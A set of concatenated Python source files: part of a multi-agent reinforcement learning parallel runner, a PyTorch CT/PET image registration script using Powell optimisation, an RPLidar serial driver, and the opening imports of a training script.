# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
episode_returns[idx] += data["reward"]
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
if test_mode and (len(self.test_returns) == n_test_runs):
self._log(cur_returns, cur_stats, log_prefix)
elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
self._log(cur_returns, cur_stats, log_prefix)
if hasattr(self.mac.action_selector, "epsilon"):
self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
powell_torch.py | # /******************************************
# *MIT License
# *
# *Copyright (c) [2021] [Eleonora D'Arnese, Emanuele Del Sozzo, Davide Conficconi, Marco Domenico Santambrogio]
# *
# *Permission is hereby granted, free of charge, to any person obtaining a copy
# *of this software and associated documentation files (the "Software"), to deal
# *in the Software without restriction, including without limitation the rights
# *to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# *copies of the Software, and to permit persons to whom the Software is
# *furnished to do so, subject to the following conditions:
# *
# *The above copyright notice and this permission notice shall be included in all
# *copies or substantial portions of the Software.
# *
# *THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# *IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# *FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# *AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# *LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# *OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# *SOFTWARE.
# ******************************************/
import os
import pydicom
import cv2
import numpy as np
import math
import glob
import time
import pandas as pd
from torch.multiprocessing import Pool, Process, set_start_method
import struct
import statistics
import argparse
import kornia
import torch
compute_metric = None
precompute_metric = None
device = "cpu"
ref_vals = None
move_data = None
def no_transfer(input_data):
return input_data
def to_cuda(input_data):
return input_data.cuda(non_blocking=True)
def batch_transform(images, pars):
img_warped = kornia.geometry.warp_affine(images, pars, mode="nearest", dsize=(images.shape[2], images.shape[3]))
return img_warped
def transform(image, par):
tmp_img = image.reshape((1, 1, *image.shape)).float()
t_par = torch.unsqueeze(par, dim=0)
img_warped = kornia.geometry.warp_affine(tmp_img, t_par, mode="nearest", dsize=(tmp_img.shape[2], tmp_img.shape[3]))
return img_warped
def compute_moments(img):
moments = torch.empty(6, device=device)
l = torch.arange(img.shape[0], device=device)
moments[0] = torch.sum(img) # m00
moments[1] = torch.sum(img * l) # m10
moments[2] = torch.sum(img * (l**2)) # m20
moments[3] = torch.sum(img * l.reshape((img.shape[0], 1)) ) # m01
moments[4] = torch.sum(img * (l.reshape((img.shape[0], 1)))**2 ) # m02
moments[5] = torch.sum(img * l * l.reshape((img.shape[0], 1))) # m11
return moments
def to_matrix_blocked(vector_params):
mat_params=torch.empty((2,3))
mat_params[0][2]=vector_params[0]
mat_params[1][2]=vector_params[1]
if vector_params[2] > 1 or vector_params[2] < -1:
mat_params[0][0]=1 #cos_teta
mat_params[1][1]=1 #cos_teta
mat_params[0][1]=0
mat_params[1][0]=0
else:
mat_params[0][0]=vector_params[2] #cos_teta
mat_params[1][1]=vector_params[2] #cos_teta
mat_params[0][1]=torch.sqrt(1-(vector_params[2]**2))
mat_params[1][0]=-mat_params[0][1]
return (mat_params)
def estimate_initial(Ref_uint8, Flt_uint8, params):
ref_mom = compute_moments(Ref_uint8)
flt_mom = compute_moments(Flt_uint8)
flt_avg_10 = flt_mom[1]/flt_mom[0]
flt_avg_01 = flt_mom[3]/flt_mom[0]
flt_mu_20 = (flt_mom[2]/flt_mom[0]*1.0)-(flt_avg_10*flt_avg_10)
flt_mu_02 = (flt_mom[4]/flt_mom[0]*1.0)-(flt_avg_01*flt_avg_01)
flt_mu_11 = (flt_mom[5]/flt_mom[0]*1.0)-(flt_avg_01*flt_avg_10)
ref_avg_10 = ref_mom[1]/ref_mom[0]
ref_avg_01 = ref_mom[3]/ref_mom[0]
ref_mu_20 = (ref_mom[2]/ref_mom[0]*1.0)-(ref_avg_10*ref_avg_10)
ref_mu_02 = (ref_mom[4]/ref_mom[0]*1.0)-(ref_avg_01*ref_avg_01)
ref_mu_11 = (ref_mom[5]/ref_mom[0]*1.0)-(ref_avg_01*ref_avg_10)
params[0][2] = ref_mom[1]/ref_mom[0]-flt_mom[1]/flt_mom[0]
params[1][2] = ref_mom[3]/ref_mom[0] - flt_mom[3]/flt_mom[0]
rho_flt=0.5*torch.atan((2.0*flt_mu_11)/(flt_mu_20-flt_mu_02))
rho_ref=0.5*torch.atan((2.0*ref_mu_11)/(ref_mu_20-ref_mu_02))
delta_rho=rho_ref-rho_flt
roundness=(flt_mom[2]/flt_mom[0]) / (flt_mom[4]/flt_mom[0])
if torch.abs(roundness-1.0)>=0.3:
params[0][0]= torch.cos(delta_rho)
params[0][1] = -torch.sin(delta_rho)
params[1][0] = torch.sin(delta_rho)
params[1][1] = torch.cos(delta_rho)
else:
params[0][0]= 1.0
params[0][1] = 0.0
params[1][0] = 0.0
params[1][1] = 1.0
return (params)
def my_squared_hist2d_t(sample, bins, smin, smax):
D, N = sample.shape
edges = torch.linspace(smin, smax, bins + 1, device=device)
nbin = edges.shape[0] + 1
# Compute the bin number each sample falls into.
Ncount = D*[None]
for i in range(D):
Ncount[i] = torch.searchsorted(edges, sample[i, :], right=True)
# Using digitize, values that fall on an edge are put in the right bin.
# For the rightmost bin, we want values equal to the right edge to be
# counted in the last bin, and not as an outlier.
for i in range(D):
# Find which points are on the rightmost edge.
on_edge = (sample[i, :] == edges[-1])
# Shift these points one bin to the left.
Ncount[i][on_edge] -= 1
# Compute the sample indices in the flattened histogram matrix.
xy = Ncount[0]*nbin+Ncount[1]
# Compute the number of repetitions in xy and assign it to the
hist = torch.bincount(xy, None, minlength=nbin*nbin)
# Shape into a proper matrix
hist = hist.reshape((nbin, nbin))
hist = hist.float()
# Remove outliers (indices 0 and -1 for each dimension).
hist = hist[1:-1,1:-1]
return hist
def precompute_mutual_information(Ref_uint8_ravel):
href = torch.histc(Ref_uint8_ravel, bins=256)
href /= Ref_uint8_ravel.numel()
href=href[href>0.000000000000001]
eref=(torch.sum(href*(torch.log2(href))))*-1
return eref
def mutual_information(Ref_uint8_ravel, Flt_uint8_ravel, eref):
if(device == "cuda"):
idx_joint = torch.stack((Ref_uint8_ravel, Flt_uint8_ravel)).long()
j_h_init = torch.sparse.IntTensor(idx_joint, ref_vals, torch.Size([hist_dim, hist_dim])).to_dense()/Ref_uint8_ravel.numel()
else:
idx_joint = torch.stack((Ref_uint8_ravel, Flt_uint8_ravel))
j_h_init = my_squared_hist2d_t(idx_joint, hist_dim, 0, 255)/Ref_uint8_ravel.numel()
j_h = j_h_init[j_h_init>0.000000000000001]
entropy=(torch.sum(j_h*(torch.log2(j_h))))*-1
hflt=torch.sum(j_h_init,axis=0)
hflt=hflt[hflt>0.000000000000001]
eflt=(torch.sum(hflt*(torch.log2(hflt))))*-1
mutualinfo=eref+eflt-entropy
return(mutualinfo)
def precompute_cross_correlation(Ref_uint8_ravel):
return torch.sum(Ref_uint8_ravel * Ref_uint8_ravel)
def cross_correlation(Ref_uint8_ravel, Flt_uint8_ravel, cc_ref):
cc_ref_flt = torch.sum(Ref_uint8_ravel * Flt_uint8_ravel)
cc_flt = torch.sum(Flt_uint8_ravel * Flt_uint8_ravel)
return - cc_ref_flt/torch.sqrt(cc_ref*cc_flt)
def precompute_mean_squared_error(Ref_uint8_ravel):
pass
def mean_squared_error(Ref_uint8_ravel, Flt_uint8_ravel, mse_ref):
return torch.sum((Ref_uint8_ravel - Flt_uint8_ravel)**2)
def compute_mi(ref_img, flt_imgs, t_mats, eref):
flt_warped = batch_transform(flt_imgs, t_mats)
#flt_img = transform(flt_img, t_mat)
mi_a = mutual_information(ref_img, flt_warped[0].ravel(), eref)
mi_b = mutual_information(ref_img, flt_warped[1].ravel(), eref)
return torch.exp(-mi_a).cpu(), torch.exp(-mi_b).cpu()
def compute_cc(ref_img, flt_imgs, t_mats, cc_ref):
flt_warped = batch_transform(flt_imgs, t_mats)
cc_a = cross_correlation(ref_img, flt_warped[0].ravel(), cc_ref)
cc_b = cross_correlation(ref_img, flt_warped[1].ravel(), cc_ref)
return cc_a.cpu(), cc_b.cpu()
def compute_mse(ref_img, flt_imgs, t_mats, mse_ref):
flt_warped = batch_transform(flt_imgs, t_mats)
mse_a = mean_squared_error(ref_img, flt_warped[0].ravel(), mse_ref)
mse_b = mean_squared_error(ref_img, flt_warped[1].ravel(), mse_ref)
return mse_a.cpu(), mse_b.cpu()
def optimize_goldsearch(par, rng, ref_sup_ravel, flt_stack, linear_par, i, eref):
start=par-0.382*rng
end=par+0.618*rng
c=(end-(end-start)/1.618)
d=(start+(end-start)/1.618)
best_mi = 0.0
while(math.fabs(c-d)>0.005):
linear_par[i]=c
a_mat=to_matrix_blocked(linear_par)
linear_par[i]=d
b_mat=to_matrix_blocked(linear_par)
mats = move_data(torch.stack((a_mat, b_mat)))
mi_a, mi_b = compute_metric(ref_sup_ravel, flt_stack, mats, eref)
if(mi_a < mi_b):
end=d
best_mi = mi_a
linear_par[i]=c
else:
start=c
best_mi = mi_b
linear_par[i]=d
c=(end-(end-start)/1.618)
d=(start+(end-start)/1.618)
return (end+start)/2, best_mi
def optimize_powell(rng, par_lin, ref_sup_ravel, flt_stack, eref):
converged = False
eps = 0.000005
last_mut=100000.0
it=0
while(not converged):
converged=True
it=it+1
for i in range(par_lin.numel()):
cur_par = par_lin[i]
cur_rng = rng[i]
param_opt, cur_mi = optimize_goldsearch(cur_par, cur_rng, ref_sup_ravel, flt_stack, par_lin, i, eref)
par_lin[i]=cur_par
if last_mut-cur_mi>eps:
par_lin[i]=param_opt
last_mut=cur_mi
converged=False
else:
par_lin[i]=cur_par
#print("Iterations "+str(it))
return (par_lin)
def register_images(Ref_uint8, Flt_uint8):
params = torch.empty((2,3), device=device)
estimate_initial(Ref_uint8, Flt_uint8, params)
params_cpu = params.cpu()
rng = torch.tensor([80.0, 80.0, 1.0])
pa = torch.tensor([params_cpu[0][2],params_cpu[1][2],params_cpu[0][0]])
Ref_uint8_ravel = Ref_uint8.ravel().double()
eref = precompute_metric(Ref_uint8_ravel)
flt_u = torch.unsqueeze(Flt_uint8, dim=0).float()
flt_stack = torch.stack((flt_u, flt_u))
optimal_params = optimize_powell(rng, pa, Ref_uint8_ravel, flt_stack, eref)
params_trans=to_matrix_blocked(optimal_params)
flt_transform = transform(Flt_uint8, move_data(params_trans))
return (flt_transform)
def save_data(OUT_STAK, name, res_path):
for i in range(len(OUT_STAK)):
b=name[i].split('/')
c=b.pop()
d=c.split('.')
cv2.imwrite(os.path.join(res_path, d[0][0:2]+str(int(d[0][2:5]))+'.png'), kornia.tensor_to_image(OUT_STAK[i].cpu().byte())) #Creare cartelle
def compute(CT, PET, name, curr_res, t_id, patient_id):
final_img=[]
times=[]
t = 0.0
it_time = 0.0
hist_dim = 256
dim = 512
global ref_vals
ref_vals = torch.ones(dim*dim, dtype=torch.int, device=device)
global move_data
move_data = no_transfer if device=="cpu" else to_cuda
for c,ij in enumerate(zip(CT, PET)):
i = ij[0]
j = ij[1]
ref = pydicom.dcmread(i)
Ref_img = torch.tensor(ref.pixel_array.astype(np.int16), dtype=torch.int16, device=device)
Ref_img[Ref_img==-2000]=1
flt = pydicom.dcmread(j)
Flt_img = torch.tensor(flt.pixel_array.astype(np.int16), dtype=torch.int16, device=device)
Ref_img = (Ref_img - Ref_img.min())/(Ref_img.max() - Ref_img.min())*255
Ref_uint8 = Ref_img.round().type(torch.uint8)
Flt_img = (Flt_img - Flt_img.min())/(Flt_img.max() - Flt_img.min())*255
Flt_uint8 = Flt_img.round().type(torch.uint8)
start_time = time.time()
f_img = register_images(Ref_uint8, Flt_uint8)
end_time= time.time()
final_img.append(f_img.cpu())
it_time = (end_time - start_time)
times.append(it_time)
t=t+it_time
df = pd.DataFrame([t, np.mean(times), np.std(times)],columns=['Test'+str(patient_id)])#+str(config)accel_id.get_config())])
times_df = pd.DataFrame(times,columns=['Test'+str(patient_id)])#+str(config)accel_id.get_config())])
df_path = os.path.join(curr_res,'Time_powll_%02d.csv' % (t_id))
times_df_path = os.path.join(curr_res,'Img_powll_%02d.csv' % (t_id))
df.to_csv(df_path, index=False)
times_df.to_csv(times_df_path, index=False)
save_data(final_img,PET,curr_res)
def compute_wrapper(args, num_threads=1):
config=args.config
for k in range(args.offset, args.patient):
pool = []
curr_prefix = args.prefix+str(k)
curr_ct = os.path.join(curr_prefix,args.ct_path)
curr_pet = os.path.join(curr_prefix,args.pet_path)
curr_res = os.path.join("",args.res_path)
os.makedirs(curr_res,exist_ok=True)
CT=glob.glob(curr_ct+'/*dcm')
PET=glob.glob(curr_pet+'/*dcm')
PET.sort()
CT.sort()
assert len(CT) == len(PET)
images_per_thread = len(CT) // num_threads
print(images_per_thread)
for i in range(num_threads):
start = images_per_thread * i
end = images_per_thread * (i + 1) if i < num_threads - 1 else len(CT)
name = "t%02d" % (i)
pool.append(Process(target=compute, args=(CT[start:end], PET[start:end], name, curr_res, i, k)))
for t in pool:
t.start()
for t in pool:
t.join()
hist_dim = 256
dim = 512
def main():
parser = argparse.ArgumentParser(description='Iron software for IR onto a python env')
parser.add_argument("-pt", "--patient", nargs='?', help='Number of the patient to analyze', default=1, type=int)
parser.add_argument("-o", "--offset", nargs='?', help='Starting patient to analyze', default=0, type=int)
parser.add_argument("-cp", "--ct_path", nargs='?', help='Path of the CT Images', default='./')
parser.add_argument("-pp", "--pet_path", nargs='?', help='Path of the PET Images', default='./')
parser.add_argument("-rp", "--res_path", nargs='?', help='Path of the Results', default='./')
parser.add_argument("-t", "--thread_number", nargs='?', help='Number of // threads', default=1, type=int)
parser.add_argument("-px", "--prefix", nargs='?', help='prefix Path of patients folder', default='./')
parser.add_argument("-im", "--image_dimension", nargs='?', help='Target images dimensions', default=512, type=int)
parser.add_argument("-c", "--config", nargs='?', help='prefix Path of patients folder', default='./')
parser.add_argument("-mtr", "--metric", nargs='?', help='Metric accelerator to be tested', choices=['MI', 'CC', 'MSE'], default='MI')
parser.add_argument("-dvc", "--device", nargs='?', help='Target device', choices=['cpu', 'cuda'], default='cpu')
args = parser.parse_args()
num_threads=args.thread_number
patient_number=args.patient
print(args.config)
print(args)
global compute_metric, precompute_metric
if args.metric == "MI":
compute_metric = compute_mi
precompute_metric = precompute_mutual_information
elif args.metric == "CC":
compute_metric = compute_cc
precompute_metric = precompute_cross_correlation
elif args.metric == "MSE":
compute_metric = compute_mse
precompute_metric = precompute_mean_squared_error
else:
print("Unsupported metric!")
exit()
global device
device = args.device
compute_wrapper(args, num_threads)
print("Faber Powell python is at the end :)")
if __name__== "__main__":
main()
|
rplidar-save3.py | '''Simple and lightweight module for working with RPLidar rangefinder scanners.
Usage example:
>>> from rplidar import RPLidar
>>> lidar = RPLidar('/dev/ttyUSB0')
>>>
>>> info = lidar.get_info()
>>> print(info)
>>>
>>> health = lidar.get_health()
>>> print(health)
>>>
>>> for i, scan in enumerate(lidar.iter_scans()):
... print('%d: Got %d measurments' % (i, len(scan)))
... if i > 10:
... break
...
>>> lidar.stop()
>>> lidar.stop_motor()
>>> lidar.disconnect()
For additional information please refer to the RPLidar class documentation.
'''
# import logging
import sys
import time
import codecs
import serial
import struct
from struct import pack, unpack
from threading import Thread
SYNC_BYTE = b'\xA5'
SYNC_BYTE2 = b'\x5A'
GET_INFO_BYTE = b'\x50'
GET_HEALTH_BYTE = b'\x52'
STOP_BYTE = b'\x25'
RESET_BYTE = b'\x40'
SCAN_BYTE = b'\x20'
FORCE_SCAN_BYTE = b'\x21'
DESCRIPTOR_LEN = 7
INFO_LEN = 20
HEALTH_LEN = 3
INFO_TYPE = 4
HEALTH_TYPE = 6
SCAN_TYPE = 129
#Constants & Command to start A2 motor
MAX_MOTOR_PWM = 1023
DEFAULT_MOTOR_PWM = 660
SET_PWM_BYTE = b'\xF0'
_HEALTH_STATUSES = {
0: 'Good',
1: 'Warning',
2: 'Error',
}
PY3 = True if (int(sys.version[0]) == 3) else False
class RPLidarException(Exception):
'''Basic exception class for RPLidar'''
def _b2i(byte):
'''Converts byte to integer (for Python 2 compatability)'''
return byte if PY3 else ord(byte)
# def _process_scan(raw):
# '''Processes input raw data and returns measurment data'''
# new_scan = bool(_b2i(raw[0]) & 0b1)
# inversed_new_scan = bool((_b2i(raw[0]) >> 1) & 0b1)
# quality = _b2i(raw[0]) >> 2
# if new_scan == inversed_new_scan:
# raise RPLidarException('New scan flags mismatch')
# check_bit = _b2i(raw[1]) & 0b1
# if check_bit != 1:
# raise RPLidarException('Check bit not equal to 1')
# angle = ((_b2i(raw[1]) >> 1) + (_b2i(raw[2]) << 7)) / 64.
# distance = (_b2i(raw[3]) + (_b2i(raw[4]) << 8)) / 4.
# return (new_scan, quality, angle, distance,)
class RPLidar(object):
'''Class for communicating with RPLidar rangefinder scanners'''
# serial = None #: serial port connection
# port = '' #: Serial port name, e.g. /dev/ttyUSB0
# timeout = 1 #: Serial port timeout
# motor = False #: Is motor running?
# baudrate = 115200 #: Baudrate for serial port
# def __init__(self, port, baudrate=115200, timeout=1, logger=None):
def __init__(self, logger=None):
'''Initilize RPLidar object for communicating with the sensor.
Parameters
----------
port : str
Serial port name to which sensor is connected
baudrate : int, optional
Baudrate for serial connection (the default is 115200)
timeout : float, optional
Serial port connection timeout in seconds (the default is 1)
logger : logging.Logger instance, optional
Logger instance, if none is provided new instance is created
'''
# self.serial = None
# self.port = port
# self.baudrate = baudrate
# self.timeout = timeout
self.motor_running = False
# if logger is None:
# logger = logging.getLogger(__name__)
# self.logger = logger
# self.open(port, baudrate, timeout)
# self.start_motor()
self.scan = [(0,0,)]*360
self.shutdown = False
self.new_scan = False
def __del__(self):
# self.stop()
self.shutdown = True
if self.serial:
self.motor(False)
time.sleep(1)
self.close()
print("bye")
def start(self):
self.shutdown = False
t = Thread(target=self.update2, name="rplidar", args=())
t.daemon = True
t.start()
return
def open(self, port, baudrate=115200, timeout=1):
'''Connects to the serial port with the name `self.port`. If it was
connected to another serial port disconnects from it first.'''
if self.serial:
self.close()
try:
self.serial = serial.Serial(
port,
baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
timeout=timeout,
dsrdtr=True)
# self.serial = self.serial
except serial.SerialException as err:
raise RPLidarException('Failed: %s' % err)
# self.reset()
def close(self):
'''Disconnects from the serial port'''
self.stop()
self.shutdown = True
time.sleep(0.1)
if self.serial.is_open:
self.serial.close()
self.serial = None
def set_pwm(self, pwm):
# assert(0 <= pwm <= MAX_MOTOR_PWM)
if 0 > pwm > MAX_MOTOR_PWM:
print('invalid pwm')
payload = struct.pack("<H", pwm) # little endian, unsigned short
# self._send_payload_cmd(SET_PWM_BYTE, payload)
cmd = SET_PWM_BYTE
size = struct.pack('B', len(payload))
req = SYNC_BYTE + cmd + size + payload
checksum = 0
for v in struct.unpack('B'*len(req), req):
checksum ^= v
req += struct.pack('B', checksum)
self.serial.write(req)
# def start_motor(self):
# '''Starts sensor motor'''
# if self.motor_running:
# return
# # self.logger.info('Starting motor')
# # For A1
# self.serial.dtr = False
# # For A2
# self.set_pwm(DEFAULT_MOTOR_PWM)
# self.motor_running = True
#
# def stop_motor(self):
# '''Stops sensor motor'''
# if not self.motor_running:
# return
# # self.logger.info('Stoping motor')
# # For A2
# self.set_pwm(0)
# time.sleep(.001)
# # For A1
# self.serial.dtr = True
# self.motor_running = False
def motor(self, value):
if value:
# if self.motor_running:
# return
# For A1
self.serial.dtr = False
# For A2
self.set_pwm(DEFAULT_MOTOR_PWM)
# self.motor_running = True
else:
# if not self.motor_running:
# return
# self.logger.info('Stoping motor')
# For A2
self.set_pwm(0)
time.sleep(.001)
# For A1
self.serial.dtr = True
# self.motor_running = False
# def _send_payload_cmd(self, cmd, payload):
# '''Sends `cmd` command with `payload` to the sensor'''
# size = struct.pack('B', len(payload))
# req = SYNC_BYTE + cmd + size + payload
# checksum = 0
# for v in struct.unpack('B'*len(req), req):
# checksum ^= v
# req += struct.pack('B', checksum)
# self.serial.write(req)
def info(self):
'''Get device information
Returns
-------
dict
Dictionary with the sensor information
'''
msg = [0xA5, 0x50]
dmsg = pack('2B', *msg)
self.serial.write(dmsg)
# self._send_cmd(GET_INFO_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != INFO_LEN:
raise RPLidarException('Wrong get_info reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != INFO_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
d = unpack('20B', raw)
serialnumber = codecs.encode(raw[4:], 'hex').upper()
serialnumber = codecs.decode(serialnumber, 'ascii')
# data = {
# 'model': _b2i(raw[0]),
# 'firmware': (_b2i(raw[2]), _b2i(raw[1])),
# 'hardware': _b2i(raw[3]),
# 'serialnumber': serialnumber,
# }
data = {
'model': d[0],
'firmware': (d[2], d[1]),
'hardware': d[3],
'serialnumber': serialnumber,
}
return data
def health(self):
'''Get device health state. When the core system detects some
potential risk that may cause hardware failure in the future,
the returned status value will be 'Warning'. But sensor can still work
as normal. When sensor is in the Protection Stop state, the returned
status value will be 'Error'. In case of warning or error statuses
non-zero error code will be returned.
Returns
-------
status : str
'Good', 'Warning' or 'Error' statuses
error_code : int
The related error code that caused a warning/error.
'''
self._send_cmd(GET_HEALTH_BYTE)
dsize, is_single, dtype = self._read_descriptor()
if dsize != HEALTH_LEN:
raise RPLidarException('Wrong get_info reply length')
if not is_single:
raise RPLidarException('Not a single response mode')
if dtype != HEALTH_TYPE:
raise RPLidarException('Wrong response data type')
raw = self._read_response(dsize)
status = _HEALTH_STATUSES[_b2i(raw[0])]
error_code = (_b2i(raw[1]) << 8) + _b2i(raw[2])
return status, error_code
def stop(self):
'''Stops scanning process, disables laser diode and the measurment
system, moves sensor to the idle state.'''
# self.logger.info('Stoping scanning')
# self._send_cmd(STOP_BYTE)
# time.sleep(.001)
msg = [0xa5, 0x25]
msg = pack('2B', *msg)
self.serial.write(msg)
time.sleep(0.1)
self.motor(False)
# self.clear_input()
# self.serial.read_all()
def reset(self):
"""
Resets sensor core, reverting it to a similar state as it has
just been powered up. Should return something like this:
RP LIDAR System.
Firmware Ver 1.24 - rc0, HW Ver 5
Model: 18
"""
msg = [0xa5, 0x40]
msg = pack('2B', *msg)
self.serial.write(msg)
time.sleep(0.1)
# data = self.serial.read(1024) # first byte is 0xA5/165 and second is 0x40/64
# offset = 0
# # print(data)
#
# b = unpack('{}B'.format(len(data)), data)
# # print(b)
#
# for i, p in enumerate(b):
# if p == 82 and b[i+1] == 80:
# offset = i
# data = data[offset:]
# # print('offset', offset)
# # print('>> ',len(data))
# print('reboot data[{}]========\n{}\n========================'.format(len(data), data.decode('utf8')))
time.sleep(1)
def get(self, max_buf_meas=500):
'''Iterate over measurments. Note that consumer must be fast enough,
otherwise data will be accumulated inside buffer and consumer will get
data with increaing lag.
Parameters
----------
max_buf_meas : int
Maximum number of measurments to be stored inside the buffer. Once
numbe exceeds this limit buffer will be emptied out.
Yields
------
new_scan : bool
True if measurment belongs to a new scan
quality : int
Reflected laser pulse strength
angle : float
The measurment heading angle in degree unit [0, 360)
distance : float
Measured object distance related to the sensor's rotation center.
In millimeter unit. Set to 0 when measurment is invalid.
'''
while not self.new_scan:
time.sleep(0.001)
self.new_scan = False
return self.scan
def update(self):
# max_buf_meas=500 # ??
self.start_motor()
self.reset()
self.serial.reset_input_buffer()
msg = [0xa5, 0x20]
msg = pack('2B', *msg)
self.serial.write(msg)
time.sleep(0.001)
self.scan = [(0,0,)]*360
# done = False
while not self.shutdown:
raw = self.serial.read(1024)
print('read', len(raw))
data = unpack('{}B'.format(len(raw)), raw)
offset = 0
# print('data', data)
while len(data[offset:]) >= 12:
if data[offset:offset+7] == (0xa5,0x5a,0x05,0,0,0x40,0x81,):
print("==[header found]==")
offset += 7
size_pkt = len(data[offset:])
while (offset + 5) <= size_pkt:
pkt = data[offset:offset+5]
start = ((1 & pkt[0]) == 1)
if start:
print("====[start]==================================")
q = (pkt[0] >> 2)
angle = ((pkt[2] << 7) + (pkt[1] >> 1))/64
dist = (pkt[4] << 8) + pkt[3]
offset += 5
print('range',angle, dist, q)
else:
# print([hex(x) for x in data[offset:offset+7]])
offset += 1
print('buffer clear')
def getscan(self, data):
"""
Once the header packet is found, this functions pulls the measurements
until it runs out of usable bytes.
return: left over bytes
"""
offset = 0
len_data = len(data)
while (offset + 5) <= len_data:
pkt = data[offset:offset+5]
start = ((1 & pkt[0]) == 1)
if start:
print("====[start]==================================")
self.scan = [(0,0,)]*360
self.new_scan = True
chkS = (((pkt[0] & 2) >> 1) != (1 & pkt[0]))
if not chkS:
# print(((pkt[0] & 2) >> 1))
# print(1 & pkt[0])
# raise Exception('S')
print('S')
offset += 5
continue
if not (pkt[1] & 1):
# raise Exception('C')
print('C')
offset += 5
continue
q = (pkt[0] >> 2)
angle = ((pkt[2] << 7) + (pkt[1] >> 1))/64
dist = ((pkt[4] << 8) + pkt[3])/4 # mm
offset += 5
# print('range',angle, dist, q)
self.scan[int(angle)] = (angle, dist)
return data[offset:]
def update2(self):
# max_buf_meas=500 # ??
self.motor(True)
self.reset()
self.serial.reset_input_buffer()
msg = [0xa5, 0x20]
msg = pack('2B', *msg)
self.serial.write(msg)
time.sleep(0.001)
self.scan = [(0,0,)]*360
# done = False
raw = self.serial.read(1024)
print('read', len(raw))
data = unpack('{}B'.format(len(raw)), raw)
offset = 0
data_len = len(data)
# find header
while True:
if data[offset:offset+7] == (0xa5,0x5a,0x05,0,0,0x40,0x81,):
print("==[header found]==")
offset += 7
break
# print([hex(x) for x in data[offset:offset+7]])
offset += 1
if (offset+7) > data_len:
print('offset', offset, 'send scan again')
# raise Exception("out of data")
msg = [0xa5, 0x20]
msg = pack('2B', *msg)
self.serial.write(msg)
time.sleep(0.001)
raw = self.serial.read(1024)
print('read', len(raw))
data = unpack('{}B'.format(len(raw)), raw)
offset = 0
data_len = len(data)
# get scan packets
while not self.shutdown:
rest = self.getscan(data[offset:])
raw = self.serial.read(1024)
print('read', len(raw))
data = rest + unpack('{}B'.format(len(raw)), raw)
offset = 0
print('buffer clear')
|
train_viewpose.py | import matplotlib
matplotlib.use('Agg')
import os
from os.path import join
import argparse
import torch
import numpy as np
import pickle
import sys
import datetime
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
